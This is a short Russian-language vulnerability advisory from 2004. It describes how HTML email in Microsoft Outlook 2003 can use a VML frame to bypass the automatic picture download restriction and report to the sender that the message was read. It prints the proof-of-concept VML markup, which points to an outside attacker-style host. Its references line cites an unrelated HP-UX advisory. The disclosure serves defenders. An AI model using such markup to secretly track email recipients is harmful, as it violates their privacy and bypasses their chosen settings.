Обход ограничений Automatic Picture Download Settings в Microsoft Outlook 2003

Дата публикации:
12.05.2004
Всего просмотров:
872
Опасность:
Низкая
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: Microsoft Outlook 2003

Описание: Уязвимость обнаружена в Microsoft Outlook 2003. Удаленный пользователь может послать специально сформированное email сообщение, которое, когда будет просмотрено целевым пользователем, пошлет отчет удаленному серверу что сообщение было прочитано.

Уязвимость в Microsoft VML schema для Outlook 2003 позволяет удаленному пользователю обойти ограничения Automatic Picture Download Settings, которые предотвращают возможность определить, было ли прочитано сообщение. Удаленный пользователь может послать специально сформированное HTML email сообщение, которое определяет VML frame стиль ссылающийся на Web сайт удаленного пользователя, чтобы заставить Outlook клиент целевого пользователя подключится к удаленному Web сайту, чтобы сообщить о том, что сообщение было прочитано.

Пример/Эксплоит:

<v:vml frame style="LEFT: 50px; WIDTH: 300px; POSITION: 
relative; TOP: 30px; HEIGHT: 200px" 
src = "http://www.malware.com/duh.txt#malware"></v:vmlframe>

<HTML>
<HEAD>
<STYLE>
v\:* { behavior: url(#default#VML); }
</STYLE>
<XML:NAMESPACE NS="urn:schemas-microsoft-com:vml" PREFIX="v"/>
</HEAD>

URL производителя: http://www.microsoft.com/technet/security/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: SSRT3613 rev.0 HP-UX B6848AB GTK+ Support Libraries elevated privileges

или введите имя

CAPTCHA